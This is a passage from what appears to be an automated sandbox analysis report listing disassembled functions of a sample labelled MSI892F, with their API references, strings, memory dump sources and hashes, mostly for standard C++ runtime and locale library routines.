FreeLibrary.KERNEL32(00000000,?,00000000,001DCBE4,000000FF,?,001C83F1,?,?,001C83C5,?), ref: 001C84CA

Strings

CorExitProcess, xrefs: 001C84A0
mscoree.dll, xrefs: 001C848F

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 5a45686950d5dd0b9ad2ff8ce50ad5447333d35e6b28537e57c4236d1c9a5bba
Instruction ID: be17cdf9d4bccfc282451b0c53333b04b1cee637493329b67fb722cffa323420
Opcode Fuzzy Hash: 5a45686950d5dd0b9ad2ff8ce50ad5447333d35e6b28537e57c4236d1c9a5bba
Instruction Fuzzy Hash: 9301D671905666EFCB019F50EC45FAEBBF8FB04B10F00452BF811A2690DB74D940CB90

Function 001ADDD2 Relevance: 7.9, APIs: 5, Instructions: 433COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001ADDD9
collate.LIBCPMT ref: 001ADF54
numpunct.LIBCPMT ref: 001AE1CE

Part of subcall function 001A83C2: __EH_prolog3.LIBCMT ref: 001A83C9

Part of subcall function 001A815A: __EH_prolog3.LIBCMT ref: 001A8161
Part of subcall function 001A815A: std::_Lockit::_Lockit.LIBCPMT ref: 001A816B
Part of subcall function 001A815A: std::_Lockit::~_Lockit.LIBCPMT ref: 001A81DC

Part of subcall function 0019EAF0: std::_Lockit::_Lockit.LIBCPMT ref: 0019EB1D
Part of subcall function 0019EAF0: std::_Lockit::_Lockit.LIBCPMT ref: 0019EB40
Part of subcall function 0019EAF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019EB68
Part of subcall function 0019EAF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019EC07

Part of subcall function 001A4403: Concurrency::cancel_current_task.LIBCPMT ref: 001A44C6

Part of subcall function 001A764B: __EH_prolog3.LIBCMT ref: 001A7652
Part of subcall function 001A764B: std::_Lockit::_Lockit.LIBCPMT ref: 001A765C
Part of subcall function 001A764B: std::_Lockit::~_Lockit.LIBCPMT ref: 001A76CD

__Getcoll.LIBCPMT ref: 001ADF94

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

Part of subcall function 001984C0: LocalAlloc.KERNEL32(00000040,00000000,001B839D,00000000,08E011E3,?,00000000,?,00000000,?,001DCB8D,000000FF,?,001917D5,00000000,001DD3BA), ref: 001984C6

Part of subcall function 0019B9E0: __Getctype.LIBCPMT ref: 0019B9EB

Part of subcall function 001A7A5E: __EH_prolog3.LIBCMT ref: 001A7A65
Part of subcall function 001A7A5E: std::_Lockit::_Lockit.LIBCPMT ref: 001A7A6F
Part of subcall function 001A7A5E: std::_Lockit::~_Lockit.LIBCPMT ref: 001A7AE0

Part of subcall function 001A7B88: __EH_prolog3.LIBCMT ref: 001A7B8F
Part of subcall function 001A7B88: std::_Lockit::_Lockit.LIBCPMT ref: 001A7B99
Part of subcall function 001A7B88: std::_Lockit::~_Lockit.LIBCPMT ref: 001A7C0A

Part of subcall function 001A7DDC: __EH_prolog3.LIBCMT ref: 001A7DE3
Part of subcall function 001A7DDC: std::_Lockit::_Lockit.LIBCPMT ref: 001A7DED
Part of subcall function 001A7DDC: std::_Lockit::~_Lockit.LIBCPMT ref: 001A7E5E

Part of subcall function 001A7D47: __EH_prolog3.LIBCMT ref: 001A7D4E
Part of subcall function 001A7D47: std::_Lockit::_Lockit.LIBCPMT ref: 001A7D58
Part of subcall function 001A7D47: std::_Lockit::~_Lockit.LIBCPMT ref: 001A7DC9

Part of subcall function 001A4403: __EH_prolog3.LIBCMT ref: 001A440A
Part of subcall function 001A4403: std::_Lockit::_Lockit.LIBCPMT ref: 001A4414
Part of subcall function 001A4403: std::_Lockit::~_Lockit.LIBCPMT ref: 001A44BB

codecvt.LIBCPMT ref: 001AE27F

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtcollatenumpunct
String ID:
API String ID: 2252558201-0
Opcode ID: e204518c87cbf796d0f882e8f7972c63cdd996e8b5cae9299fb513ef127d37f3
Instruction ID: ae611d13f9f455fcc85a0d14bacb0d1078ff2943eb2b27cb469640248ebc74e1
Opcode Fuzzy Hash: e204518c87cbf796d0f882e8f7972c63cdd996e8b5cae9299fb513ef127d37f3
Instruction Fuzzy Hash: 89E113B990061A9FDF116F649D426BF7AE4FFA3360F11442EF919AB281EB708D1087D1

Function 001AD8F2 Relevance: 7.8, APIs: 5, Instructions: 346COMMON

Download Yara Rule

APIs

ctype.LIBCPMT ref: 001AD944

Part of subcall function 001AD458: __Getctype.LIBCPMT ref: 001AD467

collate.LIBCPMT ref: 001ADA78
__Getcoll.LIBCPMT ref: 001ADAB8

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

Part of subcall function 001984C0: LocalAlloc.KERNEL32(00000040,00000000,001B839D,00000000,08E011E3,?,00000000,?,00000000,?,001DCB8D,000000FF,?,001917D5,00000000,001DD3BA), ref: 001984C6

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Lockitstd::_$AllocGetcollGetctypeLocalLockit::_Lockit::~_collatectype
String ID:
API String ID: 1112474886-0
Opcode ID: a333030384d077840c40ce69567f59e8aeb66096f1443c92b91f2383e561dde4
Instruction ID: 08b55e9be183c2ef375246de9e65d610034825cbdf1d7a4b55f31f3755f936ef
Opcode Fuzzy Hash: a333030384d077840c40ce69567f59e8aeb66096f1443c92b91f2383e561dde4
Instruction Fuzzy Hash: 03C115B9C00A0A9FCF15AFA4A9026BF7AB4FF56360F11441EE95A6B681DF708D00D791

Function 001CC382 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 001CC409
__alloca_probe_16.LIBCMT ref: 001CC4CA
__freea.LIBCMT ref: 001CC531

Part of subcall function 001CB127: HeapAlloc.KERNEL32(00000000,?,?,?,001CAAAA,?,00000000,?,001BC282,?,?,?,?,?,?,00191668), ref: 001CB159

__freea.LIBCMT ref: 001CC546
__freea.LIBCMT ref: 001CC556

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: f269b656636c3c5a114e4e87f4a6089621603bb4036be09156914c96522ab7f8
Instruction ID: 6b5b9434053a97039ec9ccda706334b2cf15db221567cf5b1e24aad55d4278aa
Opcode Fuzzy Hash: f269b656636c3c5a114e4e87f4a6089621603bb4036be09156914c96522ab7f8
Instruction Fuzzy Hash: CD51AE72A00216AFEF259F64DC82FBB7AA9EF64750B19412DFD0CD6151EB31ED1086E0

Function 0019C590 Relevance: 7.6, APIs: 5, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0019C5BD
std::_Lockit::_Lockit.LIBCPMT ref: 0019C5E0
std::_Lockit::~_Lockit.LIBCPMT ref: 0019C608
std::_Facet_Register.LIBCPMT ref: 0019C67D
std::_Lockit::~_Lockit.LIBCPMT ref: 0019C6A7

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: afa5d435e911809f90fc55d22050bf3345075b651b100b2690138006e00346cd
Instruction ID: c9e030e348b0e1ee42624ff0c6a4c53cf40f791b47fae17dc466fa14569c672b
Opcode Fuzzy Hash: afa5d435e911809f90fc55d22050bf3345075b651b100b2690138006e00346cd
Instruction Fuzzy Hash: 7141D075800259DFDF11DF98D840BAEBBB8EF15320F18426AE854AB391D730AE44CBD1

Function 0019EAF0 Relevance: 7.6, APIs: 5, Instructions: 109COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0019EB1D
std::_Lockit::_Lockit.LIBCPMT ref: 0019EB40
std::_Lockit::~_Lockit.LIBCPMT ref: 0019EB68
std::_Facet_Register.LIBCPMT ref: 0019EBDD
std::_Lockit::~_Lockit.LIBCPMT ref: 0019EC07

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: c674b396b05a19e33161e88c7515f152dd00074bfddcc0e59a888be0424f63d7
Instruction ID: 2e4a723e8aaa0034fb8dd32bf744745a79db0afba46806bee334901d5d2be395
Opcode Fuzzy Hash: c674b396b05a19e33161e88c7515f152dd00074bfddcc0e59a888be0424f63d7
Instruction Fuzzy Hash: EE41EA71800659DFCF20DF58D880BAEBBF4FB14724F24429AE816A7391DB30AE44CB91

Function 0019EC30 Relevance: 7.6, APIs: 5, Instructions: 109COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0019EC5D
std::_Lockit::_Lockit.LIBCPMT ref: 0019EC80
std::_Lockit::~_Lockit.LIBCPMT ref: 0019ECA8
std::_Facet_Register.LIBCPMT ref: 0019ED1D
std::_Lockit::~_Lockit.LIBCPMT ref: 0019ED47

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 1f61751c305284bcc2826f30b65521498a070a95a4161f6aea2b9d35f39f33d4
Instruction ID: 9a8bdc9a312b588203f07689db460cb8d07b130838b9cae89c357e2ed6e96b22
Opcode Fuzzy Hash: 1f61751c305284bcc2826f30b65521498a070a95a4161f6aea2b9d35f39f33d4
Instruction Fuzzy Hash: E541A771800659DFCF21DF98D840BAEBBF5FB15724F14465AE810AB291D730AE44CBD1

Function 0019ED70 Relevance: 7.6, APIs: 5, Instructions: 109COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0019ED9D
std::_Lockit::_Lockit.LIBCPMT ref: 0019EDC0
std::_Lockit::~_Lockit.LIBCPMT ref: 0019EDE8
std::_Facet_Register.LIBCPMT ref: 0019EE5D
std::_Lockit::~_Lockit.LIBCPMT ref: 0019EE87

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 33585718a8d2c221ef50ab393c490c271083374f809670830cf4e3747f1bc38e
Instruction ID: 46488093e7bf0b67d389779f8ed371a42155a9b4e8496c5c8d9993f2a8b6946c
Opcode Fuzzy Hash: 33585718a8d2c221ef50ab393c490c271083374f809670830cf4e3747f1bc38e
Instruction Fuzzy Hash: 2F41C971900659DFCF20DF98D880BAEBBF9FB15724F24465AE810A7391D730AE84CB91

Function 00197C30 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 83COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000010,00000010,?,00197912,?,?), ref: 00197C37

Strings

false, xrefs: 00197C46
Last error=, xrefs: 00197CC1
true, xrefs: 00197C41
Call to ShellExecuteEx() returned:, xrefs: 00197C5D

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: ErrorLast
String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
API String ID: 1452528299-1782174991
Opcode ID: c66633a9ea3c44980dab516f9ee6fb523bdeaee167138e0340bae9a299396353
Instruction ID: ff441e5be26778275541f78f2b783ccf17c52329277a9987a93913be257b5231
Opcode Fuzzy Hash: c66633a9ea3c44980dab516f9ee6fb523bdeaee167138e0340bae9a299396353
Instruction Fuzzy Hash: E1213749A242A286CF741F3D854133AA2F0EF54755F65186FE8C9DB391EB6A8CC2C394

Function 001A6FF9 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

_Maklocstr.LIBCPMT ref: 001A7019
_Maklocstr.LIBCPMT ref: 001A7036
_Maklocstr.LIBCPMT ref: 001A7053
_Maklocchr.LIBCPMT ref: 001A7065
_Maklocchr.LIBCPMT ref: 001A7078

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Maklocstr$Maklocchr
String ID:
API String ID: 2020259771-0
Opcode ID: 4516638e77d9b5546a351ef02306ca0abb83a6988d62e123a52c8a63b0177d6e
Instruction ID: 65d23d463e83da3ae9d39fdd9984ac7b4232a08a6e953f067d294878c2c09cd6
Opcode Fuzzy Hash: 4516638e77d9b5546a351ef02306ca0abb83a6988d62e123a52c8a63b0177d6e
Instruction Fuzzy Hash: 87116DB5508B44BBE7209BA59C81B13B7A8BB0A310F04051AF1458BA81D365FA5087A4

Function 001A2823 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001A282A
std::_Lockit::_Lockit.LIBCPMT ref: 001A2834

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

numpunct.LIBCPMT ref: 001A286E
std::_Facet_Register.LIBCPMT ref: 001A2885
std::_Lockit::~_Lockit.LIBCPMT ref: 001A28A5

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
String ID:
API String ID: 743221004-0
Opcode ID: eb1634a320d6bbfc710d411da607410e87d1d1b751b5576c6ba3ea9c155bb120
Instruction ID: bfbde101c57a4ec396a528c6cad9236054e392fdb59b7b80b3055e6555a1193f
Opcode Fuzzy Hash: eb1634a320d6bbfc710d411da607410e87d1d1b751b5576c6ba3ea9c155bb120
Instruction Fuzzy Hash: 65112639901219CBDF08EBA8D9516BEB7B6AFA2B10F250009F411AB391DF749E41CBC0

Function 001A8030 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001A8037
std::_Lockit::_Lockit.LIBCPMT ref: 001A8041

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

numpunct.LIBCPMT ref: 001A807B
std::_Facet_Register.LIBCPMT ref: 001A8092
std::_Lockit::~_Lockit.LIBCPMT ref: 001A80B2

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
String ID:
API String ID: 743221004-0
Opcode ID: 7200a84dd3ba31e3e6e5f33447978a1c86b9f82bb2c3c400972bd59444db2faa
Instruction ID: aea3fcddc096c11baf8f7e304499a4ce0e2560289073ea0c7db29e10b6e4b19f
Opcode Fuzzy Hash: 7200a84dd3ba31e3e6e5f33447978a1c86b9f82bb2c3c400972bd59444db2faa
Instruction Fuzzy Hash: AA01D23A9056198BCF04FBA4D9856BEB775AFA5710F250109F511AB392DF709E05CB80

Function 001A75B6 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001A75BD
std::_Lockit::_Lockit.LIBCPMT ref: 001A75C7

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

codecvt.LIBCPMT ref: 001A7601
std::_Facet_Register.LIBCPMT ref: 001A7618
std::_Lockit::~_Lockit.LIBCPMT ref: 001A7638

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: b3e359c6b3ed54cb43a0be43ba970f24569086acdcb273f55fd1bf98215d990a
Instruction ID: f9ba416c9fad856b2c26b13e1357f261a56458446010f4f5c6a46a020e1f26de
Opcode Fuzzy Hash: b3e359c6b3ed54cb43a0be43ba970f24569086acdcb273f55fd1bf98215d990a
Instruction Fuzzy Hash: 2001D2799086199BCF04EBB8D9457BEB776AFA2710F240009E411AB3D2DF309F01CB80

Function 001A764B Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001A7652
std::_Lockit::_Lockit.LIBCPMT ref: 001A765C

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

codecvt.LIBCPMT ref: 001A7696
std::_Facet_Register.LIBCPMT ref: 001A76AD
std::_Lockit::~_Lockit.LIBCPMT ref: 001A76CD

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: 87827be7004969b819473f7b5e9225935218d82e3f6efe70a380c39c201bdf99
Instruction ID: 354da9cd10ca446f68efe86025b528f99987621160b9e58c0ebcd8639131c2fe
Opcode Fuzzy Hash: 87827be7004969b819473f7b5e9225935218d82e3f6efe70a380c39c201bdf99
Instruction Fuzzy Hash: 1101D279908A198BCF05FBA8D9457BEB7A5AFA5720F250009E515AB2D1DF709F01CBC0

Function 001A2664 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001A266B
std::_Lockit::_Lockit.LIBCPMT ref: 001A2675

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

codecvt.LIBCPMT ref: 001A26AF
std::_Facet_Register.LIBCPMT ref: 001A26C6
std::_Lockit::~_Lockit.LIBCPMT ref: 001A26E6

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: f7e555c693f0c71adb8ce9188e5aabd5fd7d3ca228a185b8c01c22f9fa3b2dbd
Instruction ID: a696c9f2a539508c3dab010739caa102cb53b8c97bc4eaf7a568b552775e7a33
Opcode Fuzzy Hash: f7e555c693f0c71adb8ce9188e5aabd5fd7d3ca228a185b8c01c22f9fa3b2dbd
Instruction Fuzzy Hash: 9B01F979905259DBCF04FBA8D8456BEB7B5AFA2710F290009E814AB391DF709E01C780

Function 001A76E0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001A76E7
std::_Lockit::_Lockit.LIBCPMT ref: 001A76F1

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

collate.LIBCPMT ref: 001A772B
std::_Facet_Register.LIBCPMT ref: 001A7742
std::_Lockit::~_Lockit.LIBCPMT ref: 001A7762

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
String ID:
API String ID: 1007100420-0
Opcode ID: 171dbee1c8c8c7b67192ffb5724f59348ffb79b7f791423ebd982c30ad1aa689
Instruction ID: 18e14e5363577e9075d5ad805b69e1b499fd112fdc22b144c391fa478ef06f09
Opcode Fuzzy Hash: 171dbee1c8c8c7b67192ffb5724f59348ffb79b7f791423ebd982c30ad1aa689
Instruction Fuzzy Hash: 2701D2399082199BCF05FBA4D9456BEB7A6AFA5720F240409E411AB3E2DF709F01CBD0

Function 001A7775 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001A777C
std::_Lockit::_Lockit.LIBCPMT ref: 001A7786

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

collate.LIBCPMT ref: 001A77C0
std::_Facet_Register.LIBCPMT ref: 001A77D7
